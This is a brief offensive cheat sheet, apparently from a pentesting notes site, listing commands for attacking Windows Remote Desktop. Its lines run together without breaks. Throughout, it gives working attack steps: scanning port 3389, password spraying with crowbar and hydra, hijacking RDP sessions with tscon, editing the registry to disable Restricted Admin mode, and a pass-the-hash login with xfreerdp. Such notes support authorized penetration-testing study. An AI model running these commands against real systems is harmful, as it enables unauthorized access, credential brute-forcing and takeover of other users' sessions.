RDP
nmap -Pn -p3389 192.168.2.143crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'hydra -L usernames.txt -p 'password123' 192.168.2.143 rdprdesktop -u admin -p password123 192.168.2.143tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}net start sessionhijackreg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /fxfreerdp /v:192.168.2.141 /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DALast updated